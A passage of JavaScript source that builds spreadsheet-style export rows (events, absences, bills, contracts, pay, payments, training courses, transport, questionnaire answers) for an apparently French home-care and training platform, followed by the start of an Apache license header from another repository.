{ startDate: { $lte: endDate, $gte: startDate } },
{ endDate: { $lte: endDate, $gte: startDate } },
{ endDate: { $gte: endDate }, startDate: { $lte: startDate } },
],
};
const events = await Event.find(query)
.sort({ startDate: -1 })
.populate({ path: 'customer', populate: { path: 'subscriptions', populate: 'service' } })
.populate('internalHour')
.populate('sector')
.populate({ path: 'histories', match: { action: { $in: TIME_STAMPING_ACTIONS }, company: companyId } })
.lean();
const eventsWithPopulatedSubscription = events.map((event) => {
if (event.type !== INTERVENTION) return event;
const { subscription, customer } = event;
const customerSubscription = customer.subscriptions.find(sub =>
UtilsHelper.areObjectIdsEquals(sub._id, subscription));
return { ...event, subscription: customerSubscription };
});
return eventsWithPopulatedSubscription;
};
exports.exportWorkingEventsHistory = async (startDate, endDate, credentials) => {
const companyId = get(credentials, 'company._id');
const events = await exports.getWorkingEventsForExport(startDate, endDate, companyId);
const auxiliaryIds = [...new Set(events.map(ev => ev.auxiliary))];
const auxiliaries = await UserRepository.getAuxiliariesWithSectorHistory(auxiliaryIds, companyId);
const rows = [workingEventExportHeader];
for (const event of events) {
let repetition = get(event.repetition, 'frequency');
repetition = NEVER === repetition ? '' : REPETITION_FREQUENCY_TYPE_LIST[repetition];
const auxiliary = event.auxiliary
? auxiliaries.find(aux => aux._id.toHexString() === event.auxiliary.toHexString())
: null;
const auxiliarySector = auxiliary ? getMatchingSector(auxiliary.sectorHistory, event) : null;
const startHourTimeStamping = event.histories.find(history => get(history, 'update.startHour'));
const endHourTimeStamping = event.histories.find(history => get(history, 'update.endHour'));
const cells = [
EVENT_TYPE_LIST[event.type],
get(event, 'internalHour.name', ''),
event.subscription ? getServiceName(event.subscription.service) : '',
displayDate('update.startHour.from', startHourTimeStamping, event.startDate),
displayDate('update.startHour.to', startHourTimeStamping),
TIMESTAMPING_ACTION_TYPE_LIST[get(startHourTimeStamping, 'action')] || '',
get(startHourTimeStamping, 'action') === MANUAL_TIME_STAMPING
? MANUAL_TIME_STAMPING_REASONS[get(startHourTimeStamping, 'manualTimeStampingReason')] : '',
displayDate('update.endHour.from', endHourTimeStamping, event.endDate),
displayDate('update.endHour.to', endHourTimeStamping),
TIMESTAMPING_ACTION_TYPE_LIST[get(endHourTimeStamping, 'action')] || '',
get(endHourTimeStamping, 'action') === MANUAL_TIME_STAMPING
? MANUAL_TIME_STAMPING_REASONS[get(endHourTimeStamping, 'manualTimeStampingReason')] : '',
UtilsHelper.formatFloatForExport(CompaniDate(event.endDate).diff(event.startDate, 'hours', true).hours),
repetition || '',
event.kmDuringEvent ? UtilsHelper.formatFloatForExport(event.kmDuringEvent) : '',
EVENT_TRANSPORT_MODE_LIST[get(event, 'transportMode')] || '',
get(event, 'sector.name') || get(auxiliarySector, 'sector.name') || '',
get(auxiliary, '_id') || '',
CIVILITY_LIST[get(auxiliary, 'identity.title')] || '',
get(auxiliary, 'identity.firstname', ''),
get(auxiliary, 'identity.lastname', '').toUpperCase(),
event.auxiliary ? 'Non' : 'Oui',
get(event, 'customer._id', ''),
CIVILITY_LIST[get(event, 'customer.identity.title')] || '',
get(event, 'customer.identity.lastname', '').toUpperCase(),
get(event, 'customer.identity.firstname', ''),
event.misc || '',
event.isBilled ? 'Oui' : 'Non',
event.isCancelled ? 'Oui' : 'Non',
CANCELLATION_CONDITION_LIST[get(event, 'cancel.condition')] || '',
CANCELLATION_REASON_LIST[get(event, 'cancel.reason')] || '',
];
rows.push(cells);
}
return rows;
};
const absenceExportHeader = [
'Id Auxiliaire',
'Auxiliaire - Prénom',
'Auxiliaire - Nom',
'Auxiliaire - Titre',
'Équipe',
'Type',
'Nature',
'Début',
'Fin',
'Equivalent heures contrat',
'Prolongation',
'Absence d\'origine',
'Divers',
];
exports.formatAbsence = (absence) => {
const hours = DraftPayHelper.getAbsenceHours(absence, absence.auxiliary.contracts);
const datetimeFormat = absence.absenceNature === HOURLY ? 'dd/LL/yyyy HH:mm' : 'dd/LL/yyyy';
return [
get(absence, 'auxiliary._id') || '',
get(absence, 'auxiliary.identity.firstname', ''),
get(absence, 'auxiliary.identity.lastname', '').toUpperCase(),
CIVILITY_LIST[get(absence, 'auxiliary.identity.title')] || '',
get(absence, 'auxiliary.sector.name') || '',
ABSENCE_TYPE_LIST[absence.absence],
ABSENCE_NATURE_LIST[absence.absenceNature],
CompaniDate(absence.startDate).format(datetimeFormat),
CompaniDate(absence.endDate).format(datetimeFormat),
UtilsHelper.formatFloatForExport(hours),
absence.extension ? 'oui' : 'non',
absence.extension ? CompaniDate(absence.extension.startDate).format(datetimeFormat) : '',
absence.misc || '',
];
};
exports.exportAbsencesHistory = async (start, end, credentials) => {
const events = await EventRepository.getAbsencesForExport(start, end, credentials);
const rows = [absenceExportHeader];
for (const event of events) {
const absenceIsOnOneMonth = CompaniDate(event.startDate).isSame(event.endDate, 'month');
if (absenceIsOnOneMonth) rows.push(exports.formatAbsence(event));
else { // split absence by month to ease analytics
rows.push(exports.formatAbsence({ ...event, endDate: CompaniDate(event.startDate).endOf('month').toISO() }));
const monthsDiff = CompaniDate(event.endDate).diff(event.startDate, 'months').months;
for (let i = 1; i <= monthsDiff; i++) {
const endOfMonth = CompaniDate(event.startDate).add({ months: i }).endOf('month').toISO();
rows.push(exports.formatAbsence({
...event,
endDate: CompaniDate(event.endDate).isBefore(endOfMonth) ? event.endDate : endOfMonth,
startDate: CompaniDate(event.startDate).add({ months: i }).startOf('month').toISO(),
}));
}
if (CompaniDate(event.startDate).add({ months: monthsDiff }).endOf('month').isBefore(event.endDate)) {
rows.push(exports.formatAbsence({
...event,
endDate: event.endDate,
startDate: CompaniDate(event.startDate).add({ months: monthsDiff + 1 }).startOf('month').toISO(),
}));
}
}
}
return rows;
};
const billAndCreditNoteExportHeader = [
'Nature',
'Identifiant',
'Date',
'Id Bénéficiaire',
'Titre',
'Nom',
'Prénom',
'Id tiers payeur',
'Tiers payeur',
'Montant HT en €',
'Montant TTC en €',
'Nombre d\'heures',
'Services',
'Date de création',
];
const exportBillSubscriptions = (bill) => {
if (!bill.subscriptions) return '';
const subscriptions = bill.subscriptions.map(sub => `${sub.service.name} - ${UtilsHelper.formatHour(sub.hours)} `
+ `- ${UtilsHelper.formatPrice(sub.inclTaxes)} TTC`);
return subscriptions.join('\r\n');
};
const formatRowCommonsForExport = (document) => {
const customerId = get(document.customer, '_id');
const customerIdentity = get(document, 'customer.identity') || {};
const cells = [
document.number || '',
document.date ? CompaniDate(document.date).format('dd/LL/yyyy') : '',
customerId ? customerId.toHexString() : '',
CIVILITY_LIST[customerIdentity.title] || '',
(customerIdentity.lastname || '').toUpperCase(),
customerIdentity.firstname || '',
];
return cells;
};
const formatBillsForExport = (bills) => {
const rows = [];
for (const bill of bills) {
const tppId = get(bill.thirdPartyPayer, '_id');
let hours = 0;
let totalExclTaxes = 0;
if (bill.subscriptions) {
for (const sub of bill.subscriptions) {
const subExclTaxesWithDiscount = UtilsHelper.computeExclTaxesWithDiscount(sub.exclTaxes, sub.discount, sub.vat);
totalExclTaxes = NumbersHelper.add(totalExclTaxes, subExclTaxesWithDiscount);
hours = NumbersHelper.add(hours, sub.hours);
}
}
if (bill.billingItemList) {
for (const bi of bill.billingItemList) {
const biExclTaxesWithDiscount = UtilsHelper.computeExclTaxesWithDiscount(bi.exclTaxes, bi.discount, bi.vat);
totalExclTaxes = NumbersHelper.add(totalExclTaxes, biExclTaxesWithDiscount);
}
}
const createdAt = get(bill, 'createdAt', null);
const cells = [
'Facture',
...formatRowCommonsForExport(bill),
tppId ? tppId.toHexString() : '',
get(bill.thirdPartyPayer, 'name') || '',
UtilsHelper.formatFloatForExport(totalExclTaxes),
UtilsHelper.formatFloatForExport(bill.netInclTaxes),
UtilsHelper.formatFloatForExport(hours),
exportBillSubscriptions(bill),
createdAt ? CompaniDate(createdAt).format('dd/LL/yyyy') : '',
];
rows.push(cells);
}
return rows;
};
const formatCreditNotesForExport = (creditNotes) => {
const rows = [];
for (const creditNote of creditNotes) {
const totalExclTaxes = (creditNote.exclTaxesCustomer || 0) + (creditNote.exclTaxesTpp || 0);
const totalInclTaxes = (creditNote.inclTaxesCustomer || 0) + (creditNote.inclTaxesTpp || 0);
const tppId = get(creditNote.thirdPartyPayer, '_id');
const createdAt = get(creditNote, 'createdAt', null);
const cells = [
'Avoir',
...formatRowCommonsForExport(creditNote),
tppId ? tppId.toHexString() : '',
get(creditNote.thirdPartyPayer, 'name') || '',
UtilsHelper.formatFloatForExport(totalExclTaxes),
UtilsHelper.formatFloatForExport(totalInclTaxes),
'',
get(creditNote, 'subscription.service.name') || '',
createdAt ? CompaniDate(createdAt).format('dd/LL/yyyy') : '',
];
rows.push(cells);
}
return rows;
};
exports.exportBillsAndCreditNotesHistory = async (startDate, endDate, credentials) => {
const query = { date: { $lte: endDate, $gte: startDate }, company: get(credentials, 'company._id') };
const bills = await Bill.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
const creditNotes = await CreditNote.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
return [billAndCreditNoteExportHeader, ...formatBillsForExport(bills), ...formatCreditNotesForExport(creditNotes)];
};
const contractExportHeader = [
'Type',
'Id Auxiliaire',
'Titre',
'Prénom',
'Nom',
'Date de début',
'Date de fin',
'Taux horaire',
'Volume horaire hebdomadaire',
];
exports.exportContractHistory = async (startDate, endDate, credentials) => {
const query = { company: get(credentials, 'company._id'), 'versions.startDate': { $lte: endDate, $gte: startDate } };
const contracts = await Contract.find(query).populate({ path: 'user', select: 'identity' }).lean();
const rows = [contractExportHeader];
for (const contract of contracts) {
const identity = get(contract, 'user.identity') || {};
for (let i = 0, l = contract.versions.length; i < l; i++) {
const version = contract.versions[i];
if (version.startDate && CompaniDate(version.startDate).isSameOrBetween(startDate, endDate)) {
rows.push([
i === 0 ? 'Contrat' : 'Avenant',
get(contract, 'user._id') || '',
CIVILITY_LIST[identity.title] || '',
identity.firstname || '',
identity.lastname || '',
version.startDate ? CompaniDate(version.startDate).format('dd/LL/yyyy') : '',
version.endDate ? CompaniDate(version.endDate).format('dd/LL/yyyy') : '',
UtilsHelper.formatFloatForExport(version.grossHourlyRate),
version.weeklyHours || '',
]);
}
}
}
return rows;
};
const payExportHeader = [
'Id Auxiliaire',
'Titre',
'Prénom',
'Nom',
'Equipe',
'Date d\'embauche',
'Début',
'Date de notif',
'Motif',
'Fin',
'Heures contrat',
'Heures absences',
'Heures à travailler',
'Heures travaillées',
'Dont exo non majo',
'Dont exo et majo',
'Détails des majo exo',
'Dont non exo et non majo',
'Dont non exo et majo',
'Détails des majo non exo',
'Heures transports',
'Solde heures',
'Dont diff mois précédent',
'Compteur',
'Heures sup à payer',
'Heures comp à payer',
'Mutuelle',
'Remboursement transport',
'Km payés',
'Km parcourus',
'Frais téléphoniques',
'Prime',
'Indemnité',
];
const getHiringDate = (contracts) => {
if (!contracts || contracts.length === 0) return null;
if (contracts.length === 1) return contracts[0].startDate;
return [...contracts].sort(DatesHelper.ascendingSort('startDate'))[0].startDate;
};
const formatLines = (surchargedPlanDetails, planName) => {
const surcharges = Object.entries(pick(surchargedPlanDetails, Object.keys(SURCHARGES)));
if (surcharges.length === 0) return null;
const lines = [planName];
for (const [surchageKey, surcharge] of surcharges) {
lines.push(`${SURCHARGES[surchageKey]}, ${surcharge.percentage}%, `
+ `${UtilsHelper.formatFloatForExport(surcharge.hours)}h`);
}
return lines.join('\r\n');
};
exports.formatSurchargedDetailsForExport = (pay, key) => {
if (!pay || (!pay[key] && (!pay.diff || !pay.diff[key]))) return '';
const formattedPlans = [];
if (pay[key]) {
for (const surchargedPlanDetails of pay[key]) {
const lines = formatLines(surchargedPlanDetails, surchargedPlanDetails.planName);
if (lines) formattedPlans.push(lines);
}
}
if (pay.diff && pay.diff[key]) {
for (const surchargedPlanDetails of pay.diff[key]) {
const lines = formatLines(surchargedPlanDetails, `${surchargedPlanDetails.planName} (M-1)`);
if (lines) formattedPlans.push(lines);
}
}
return formattedPlans.join('\r\n\r\n');
};
exports.formatHoursWithDiff = (pay, key) =>
UtilsHelper.formatFloatForExport(UtilsHelper.computeHoursWithDiff(pay, key));
exports.exportPayAndFinalPayHistory = async (startDate, endDate, credentials) => {
const companyId = get(credentials, 'company._id', null);
const query = {
endDate: { $lte: CompaniDate(endDate).endOf('month').toDate() },
startDate: { $gte: CompaniDate(startDate).startOf('month').toDate() },
company: companyId,
};
const pays = await Pay.find(query)
.sort({ startDate: 'desc' })
.populate({
path: 'auxiliary',
select: 'identity sector contracts',
populate: [
{ path: 'sector', select: '_id sector', match: { company: get(credentials, 'company._id', null) } },
{ path: 'contracts' },
],
})
.lean({ autopopulate: true, virtuals: true });
const finalPays = await FinalPay.find(query)
.sort({ startDate: 'desc' })
.populate({
path: 'auxiliary',
select: 'identity sector contracts',
populate: [
{ path: 'sector', select: '_id sector', match: { company: get(credentials, 'company._id', null) } },
{ path: 'contracts' },
],
})
.lean({ autopopulate: true, virtuals: true });
const rows = [payExportHeader];
const paysAndFinalPay = [...pays, ...finalPays];
for (const pay of paysAndFinalPay) {
const hiringDate = getHiringDate(pay.auxiliary.contracts);
const cells = [
get(pay, 'auxiliary._id') || '',
CIVILITY_LIST[get(pay, 'auxiliary.identity.title')] || '',
get(pay, 'auxiliary.identity.firstname') || '',
get(pay, 'auxiliary.identity.lastname').toUpperCase() || '',
get(pay.auxiliary, 'sector.name') || '',
hiringDate ? CompaniDate(hiringDate).format('dd/LL/yyyy') : '',
CompaniDate(pay.startDate).format('dd/LL/yyyy'),
pay.endNotificationDate ? CompaniDate(pay.endNotificationDate).format('dd/LL/yyyy') : '',
pay.endReason ? END_CONTRACT_REASONS[pay.endReason] : '',
CompaniDate(pay.endDate).format('dd/LL/yyyy'),
UtilsHelper.formatFloatForExport(pay.contractHours),
exports.formatHoursWithDiff(pay, 'absencesHours'),
exports.formatHoursWithDiff(pay, 'hoursToWork'),
exports.formatHoursWithDiff(pay, 'workedHours'),
exports.formatHoursWithDiff(pay, 'notSurchargedAndExempt'),
exports.formatHoursWithDiff(pay, 'surchargedAndExempt'),
exports.formatSurchargedDetailsForExport(pay, 'surchargedAndExemptDetails'),
exports.formatHoursWithDiff(pay, 'notSurchargedAndNotExempt'),
exports.formatHoursWithDiff(pay, 'surchargedAndNotExempt'),
exports.formatSurchargedDetailsForExport(pay, 'surchargedAndNotExemptDetails'),
exports.formatHoursWithDiff(pay, 'paidTransportHours'),
exports.formatHoursWithDiff(pay, 'hoursBalance'),
get(pay, 'diff.hoursBalance') ? UtilsHelper.formatFloatForExport(pay.diff.hoursBalance) : '0,00',
UtilsHelper.formatFloatForExport(pay.hoursCounter),
UtilsHelper.formatFloatForExport(pay.overtimeHours),
UtilsHelper.formatFloatForExport(pay.additionalHours),
pay.mutual ? 'Oui' : 'Non',
UtilsHelper.formatFloatForExport(pay.transport),
UtilsHelper.formatFloatForExport(pay.paidKm),
UtilsHelper.formatFloatForExport(pay.travelledKm),
UtilsHelper.formatFloatForExport(pay.phoneFees),
UtilsHelper.formatFloatForExport(pay.bonus),
pay.compensation ? UtilsHelper.formatFloatForExport(pay.compensation) : '0,00',
];
rows.push(cells);
}
return rows;
};
const paymentExportHeader = [
'Nature',
'Identifiant',
'Date',
'Id Bénéficiaire',
'Titre',
'Nom',
'Prénom',
'Id tiers payeur',
'Tiers payeur',
'Moyen de paiement',
'Montant TTC en €',
];
exports.exportPaymentsHistory = async (startDate, endDate, credentials) => {
const query = { date: { $lte: endDate, $gte: startDate }, company: get(credentials, 'company._id') };
const payments = await Payment.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
const rows = [paymentExportHeader];
for (const payment of payments) {
const customerId = get(payment.customer, '_id');
const thirdPartyPayerId = get(payment.thirdPartyPayer, '_id');
const cells = [
PAYMENT_NATURE_LIST[payment.nature],
payment.number || '',
CompaniDate(payment.date).format('dd/LL/yyyy'),
customerId ? customerId.toHexString() : '',
CIVILITY_LIST[get(payment, 'customer.identity.title')] || '',
get(payment, 'customer.identity.lastname', '').toUpperCase(),
get(payment, 'customer.identity.firstname', ''),
thirdPartyPayerId ? thirdPartyPayerId.toHexString() : '',
get(payment.thirdPartyPayer, 'name') || '',
PAYMENT_TYPES_LIST[payment.type] || '',
UtilsHelper.formatFloatForExport(payment.netInclTaxes),
];
rows.push(cells);
}
return rows;
};
const getEndOfCourse = (slotsGroupedByDate, slotsToPlan) => {
if (slotsToPlan.length) return 'à planifier';
if (slotsGroupedByDate.length) {
const lastDate = slotsGroupedByDate.length - 1;
const lastSlot = slotsGroupedByDate[lastDate].length - 1;
return CompaniDate(slotsGroupedByDate[lastDate][lastSlot].endDate).format('dd/LL/yyyy HH:mm:ss');
}
return '';
};
const getStartOfCourse = slotsGroupedByDate => (slotsGroupedByDate.length
? CompaniDate(slotsGroupedByDate[0][0].startDate).format('dd/LL/yyyy HH:mm:ss')
: '');
const isSlotInInterval = (slot, startDate, endDate) => CompaniDate(slot.startDate).isAfter(startDate) &&
CompaniDate(slot.endDate).isBefore(endDate);
exports.exportCourseHistory = async (startDate, endDate, credentials) => {
const slots = await CourseSlot.find({ startDate: { $lte: endDate }, endDate: { $gte: startDate } }).lean();
const courseIds = slots.map(slot => slot.course);
const courses = await Course
.find({
$or: [
{ _id: { $in: courseIds } },
{ estimatedStartDate: { $lte: endDate, $gte: startDate }, archivedAt: { $exists: false } },
],
})
.populate({ path: 'company', select: 'name' })
.populate({
path: 'subProgram',
select: 'name steps program',
populate: [
{ path: 'program', select: 'name' },
{
path: 'steps',
select: 'type activities',
populate: { path: 'activities', populate: { path: 'activityHistories' } },
},
],
})
.populate({ path: 'trainer', select: 'identity' })
.populate({ path: 'salesRepresentative', select: 'identity' })
.populate({ path: 'contact', select: 'identity' })
.populate({ path: 'slots', populate: 'attendances' })
.populate({ path: 'slotsToPlan' })
.populate({ path: 'trainees', select: 'firstMobileConnection' })
.populate({
path: 'bills',
select: 'courseFundingOrganisation company billedAt',
options: { isVendorUser: has(credentials, 'role.vendor') },
populate: [
{ path: 'courseFundingOrganisation', select: 'name' },
{ path: 'company', select: 'name' },
{ path: 'courseCreditNote', options: { isVendorUser: !!get(credentials, 'role.vendor') }, select: '_id' },
],
})
.lean();
const filteredCourses = courses
.filter(course => !course.slots.length || course.slots.some(slot => isSlotInInterval(slot, startDate, endDate)));
const questionnaireHistories = await QuestionnaireHistory
.find({ course: { $in: courseIds } })
.populate({ path: 'questionnaire', select: 'type' })
.lean();
const smsList = await CourseSmsHistory.find({ course: { $in: courseIds } }).lean();
const attendanceSheetList = await AttendanceSheet.find({ course: { $in: courseIds } }).lean();
const rows = [];
for (const course of filteredCourses) {
const slotsGroupedByDate = CourseHelper.groupSlotsByDate(course.slots);
const smsCount = smsList.filter(sms => UtilsHelper.areObjectIdsEquals(sms.course, course._id)).length;
const attendanceSheetsCount = attendanceSheetList
.filter(attendanceSheet => UtilsHelper.areObjectIdsEquals(attendanceSheet.course, course._id))
.length;
const attendances = course.slots.map(slot => slot.attendances).flat();
const courseTraineeList = course.trainees.map(trainee => trainee._id);
const subscribedTraineesAttendancesCount = attendances
.filter(attendance => UtilsHelper.doesArrayIncludeId(courseTraineeList, attendance.trainee))
.length;
const unsubscribedTraineesAttendancesCount = attendances.length - subscribedTraineesAttendancesCount;
const upComingSlotsCount = course.slots.filter(slot => CompaniDate().isBefore(slot.startDate)).length;
const attendancesToCome = upComingSlotsCount * course.trainees.length;
const absencesCount = (course.slots.length * course.trainees.length) - subscribedTraineesAttendancesCount
- attendancesToCome;
const unsubscribedTraineesCount = uniqBy(attendances.map(a => a.trainee), trainee => trainee.toString())
.filter(attendanceTrainee => !UtilsHelper.doesArrayIncludeId(courseTraineeList, attendanceTrainee))
.length;
const pastSlotsCount = course.slots.length - upComingSlotsCount;
const expectactionQuestionnaireAnswersCount = questionnaireHistories
.filter(qh => qh.questionnaire.type === EXPECTATIONS)
.filter(qh => UtilsHelper.areObjectIdsEquals(qh.course, course._id))
.length;
const endQuestionnaireAnswersCount = questionnaireHistories
.filter(qh => qh.questionnaire.type === END_OF_COURSE)
.filter(qh => UtilsHelper.areObjectIdsEquals(qh.course, course._id))
.length;
const traineeProgressList = course.trainees
.map(trainee => CourseHelper.getTraineeElearningProgress(trainee._id, course.subProgram.steps))
.filter(trainee => trainee.progress.eLearning >= 0)
.map(trainee => trainee.progress.eLearning);
const combinedElearningProgress = traineeProgressList.reduce((acc, value) => acc + value, 0);
const courseBillsWithoutCreditNote = course.bills.filter(bill => !bill.courseCreditNote);
const payer = courseBillsWithoutCreditNote
.map(bill => get(bill, 'courseFundingOrganisation.name') || get(bill, 'company.name'))
.toString();
const isBilled = courseBillsWithoutCreditNote.map(bill => (bill.billedAt ? 'Oui' : 'Non')).toString();
rows.push({
Identifiant: course._id,
Type: course.type,
Payeur: payer || '',
Structure: course.type === INTRA ? get(course, 'company.name') : '',
Programme: get(course, 'subProgram.program.name') || '',
'Sous-Programme': get(course, 'subProgram.name') || '',
'Infos complémentaires': course.misc,
Formateur: UtilsHelper.formatIdentity(get(course, 'trainer.identity') || '', 'FL'),
'Référent Compani': UtilsHelper.formatIdentity(get(course, 'salesRepresentative.identity') || '', 'FL'),
'Contact pour la formation': UtilsHelper.formatIdentity(get(course, 'contact.identity') || '', 'FL'),
'Nombre d\'inscrits': get(course, 'trainees.length'),
'Nombre de dates': slotsGroupedByDate.length,
'Nombre de créneaux': get(course, 'slots.length'),
'Nombre de créneaux à planifier': get(course, 'slotsToPlan.length'),
'Durée Totale': UtilsHelper.getTotalDurationForExport(course.slots),
'Nombre de SMS envoyés': smsCount,
'Nombre de personnes connectées à l\'app': course.trainees
.filter(trainee => trainee.firstMobileConnection).length,
'Complétion eLearning moyenne': traineeProgressList.length
? UtilsHelper.formatFloatForExport(combinedElearningProgress / course.trainees.length)
: '',
'Nombre de réponses au questionnaire de recueil des attentes': expectactionQuestionnaireAnswersCount,
'Nombre de réponses au questionnaire de satisfaction': endQuestionnaireAnswersCount,
'Date de démarrage souhaitée': course.estimatedStartDate
? CompaniDate(course.estimatedStartDate).format('dd/LL/yyyy')
: '',
'Début de formation': getStartOfCourse(slotsGroupedByDate),
'Fin de formation': getEndOfCourse(slotsGroupedByDate, course.slotsToPlan),
'Nombre de feuilles d\'émargement chargées': attendanceSheetsCount,
'Nombre de présences': subscribedTraineesAttendancesCount,
'Nombre d\'absences': absencesCount,
'Nombre de stagiaires non prévus': unsubscribedTraineesCount,
'Nombre de présences non prévues': unsubscribedTraineesAttendancesCount,
Avancement: UtilsHelper.formatFloatForExport(pastSlotsCount / (course.slots.length + course.slotsToPlan.length)),
Facturée: isBilled,
});
}
return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
const getAddress = (slot) => {
if (get(slot, 'step.type') === ON_SITE) return get(slot, 'address.fullAddress') || '';
if (get(slot, 'step.type') === REMOTE) return slot.meetingLink || '';
return '';
};
exports.exportCourseSlotHistory = async (startDate, endDate) => {
const courseSlots = await CourseSlot.find({ startDate: { $lte: endDate }, endDate: { $gte: startDate } })
.populate({ path: 'step', select: 'type name' })
.populate({
path: 'course',
select: 'type trainees misc subProgram company',
populate: [
{ path: 'company', select: 'name' },
{ path: 'subProgram', select: 'program', populate: [{ path: 'program', select: 'name' }] },
],
})
.populate({ path: 'attendances' })
.lean();
const rows = [];
for (const slot of courseSlots) {
const slotDuration = UtilsHelper.getDurationForExport(slot.startDate, slot.endDate);
const subscribedTraineesAttendancesCount = slot.attendances
.filter(attendance => UtilsHelper.doesArrayIncludeId(slot.course.trainees, attendance.trainee))
.length;
const unsubscribedTraineesAttendancesCount = slot.attendances.length - subscribedTraineesAttendancesCount;
const absencesCount = slot.course.trainees.length - subscribedTraineesAttendancesCount;
const courseName = get(slot, 'course.type') === INTRA
? `${slot.course.company.name} - ${slot.course.subProgram.program.name} - ${slot.course.misc}`
: `${slot.course.subProgram.program.name} - ${slot.course.misc}`;
rows.push({
'Id Créneau': slot._id,
'Id Formation': slot.course._id,
Formation: courseName,
Étape: get(slot, 'step.name') || '',
Type: STEP_TYPES[get(slot, 'step.type')] || '',
'Date de création': CompaniDate(slot.createdAt).format('dd/LL/yyyy HH:mm:ss') || '',
'Date de début': CompaniDate(slot.startDate).format('dd/LL/yyyy HH:mm:ss') || '',
'Date de fin': CompaniDate(slot.endDate).format('dd/LL/yyyy HH:mm:ss') || '',
Durée: slotDuration,
Adresse: getAddress(slot),
'Nombre de présences': subscribedTraineesAttendancesCount,
'Nombre d\'absences': absencesCount,
'Nombre de présences non prévues': unsubscribedTraineesAttendancesCount,
});
}
return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
exports.exportTransportsHistory = async (startDate, endDate, credentials) => {
const rows = [];
const events = await EventRepository.getEventsByDayAndAuxiliary(
startDate,
endDate,
get(credentials, 'company._id')
);
const distanceMatrix = await DistanceMatrixHelper.getDistanceMatrices(credentials);
const sortedEventsByAuxiliary = events
.sort((a, b) => (a.auxiliary.identity.lastname).localeCompare(b.auxiliary.identity.lastname));
for (const group of sortedEventsByAuxiliary) {
const sortedEventsByDayList = group.eventsByDay.sort((a, b) => DatesHelper.ascendingSort('startDate')(a[0], b[0]));
for (const eventsGroupedByDay of sortedEventsByDayList) {
const sortedEvents = [...eventsGroupedByDay].sort(DatesHelper.ascendingSort('startDate'));
for (let i = 1; i < sortedEvents.length; i++) {
const {
duration,
travelledKm,
origins,
destinations,
transportDuration,
breakDuration,
pickTransportDuration,
} = await DraftPayHelper.getPaidTransportInfo(
{ ...sortedEvents[i], auxiliary: group.auxiliary },
{ ...sortedEvents[i - 1], auxiliary: group.auxiliary },
distanceMatrix
);
rows.push({
'Id de l\'auxiliaire': get(group, 'auxiliary._id', '').toHexString(),
'Prénom de l\'auxiliaire': get(group, 'auxiliary.identity.firstname', ''),
'Nom de l\'auxiliaire': get(group, 'auxiliary.identity.lastname', ''),
'Heure de départ du trajet': CompaniDate(sortedEvents[i - 1].endDate).format('dd/LL/yyyy HH:mm:ss'),
'Heure d\'arrivée du trajet': CompaniDate(sortedEvents[i].startDate).format('dd/LL/yyyy HH:mm:ss'),
'Adresse de départ': origins,
'Adresse d\'arrivée': destinations,
Distance: UtilsHelper.formatFloatForExport(travelledKm, 3),
'Mode de transport': EVENT_TRANSPORT_MODE_LIST[
get(group, 'auxiliary.administrative.transportInvoice.transportType')
],
'Durée du trajet': UtilsHelper
.formatFloatForExport(CompaniDuration({ minutes: transportDuration }).asHours(), 4),
'Durée inter vacation': UtilsHelper
.formatFloatForExport(CompaniDuration({ minutes: breakDuration }).asHours(), 4),
'Pause prise en compte': pickTransportDuration ? 'Non' : 'Oui',
'Durée rémunérée': UtilsHelper
.formatFloatForExport(CompaniDuration({ minutes: duration }).asHours(), 4),
});
}
}
}
return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
const _findAnswerText = (answers, answerId) => {
const answer = answers.find(qa => UtilsHelper.areObjectIdsEquals(qa._id, answerId));
return answer ? answer.text : '';
};
const _getAnswerForExport = (questionnaireCard, questionnaireHistoryAnswersList) => {
const qAnswer = questionnaireHistoryAnswersList
.find(qa => UtilsHelper.areObjectIdsEquals(qa.card._id, questionnaireCard._id));
return qAnswer
? qAnswer.answerList
.map(a => (UtilsHelper.isStringedObjectId(a) ? _findAnswerText(qAnswer.card.qcAnswers, a) : a))
.join()
: '';
};
exports.exportEndOfCourseQuestionnaireHistory = async (startDate, endDate) => {
const rows = [];
const endOfCourseQuestionnaire = await Questionnaire
.findOne({ type: END_OF_COURSE })
.populate({ path: 'cards', select: 'question template' })
.populate({
path: 'histories',
match: { createdAt: { $gte: startDate, $lte: endDate } },
populate: [
{
path: 'course',
select: 'subProgram',
populate: [
{ path: 'subProgram', select: 'name program', populate: { path: 'program', select: 'name' } },
{ path: 'trainer', select: 'identity' },
],
},
{
path: 'user',
select: 'identity local.email contact.phone company',
populate: { path: 'company', populate: { path: 'company', select: 'name' } },
},
{ path: 'questionnaireAnswersList.card', select: 'qcAnswers' },
],
})
.lean({ virtuals: true });
for (const qHistory of endOfCourseQuestionnaire.histories) {
const questionsAnswers = endOfCourseQuestionnaire.cards
.filter(card => [OPEN_QUESTION, SURVEY, QUESTION_ANSWER].includes(card.template))
.reduce((acc, card) => ({
...acc,
[card.question]: _getAnswerForExport(card, qHistory.questionnaireAnswersList),
}), {});
const row = {
'Id formation': qHistory.course._id,
Programme: get(qHistory, 'course.subProgram.program.name') || '',
'Sous-programme': get(qHistory, 'course.subProgram.name'),
'Prénom Nom intervenant(e)': UtilsHelper.formatIdentity(get(qHistory, 'course.trainer.identity') || '', 'FL'),
Structure: get(qHistory, 'user.company.name'),
'Date de réponse': CompaniDate(qHistory.createdAt).format('dd/LL/yyyy HH:mm:ss'),
'Prénom Nom répondant(e)': UtilsHelper.formatIdentity(get(qHistory, 'user.identity') || '', 'FL'),
'Mail répondant(e)': get(qHistory, 'user.local.email'),
'Numéro de tél répondant(e)': get(qHistory, 'user.contact.phone') || '',
...questionsAnswers,
};
rows.push(row);
}
return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
|
<reponame>tsatam/data-as-a-board
/*
* Copyright (c) 2019 Ford Motor Company
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
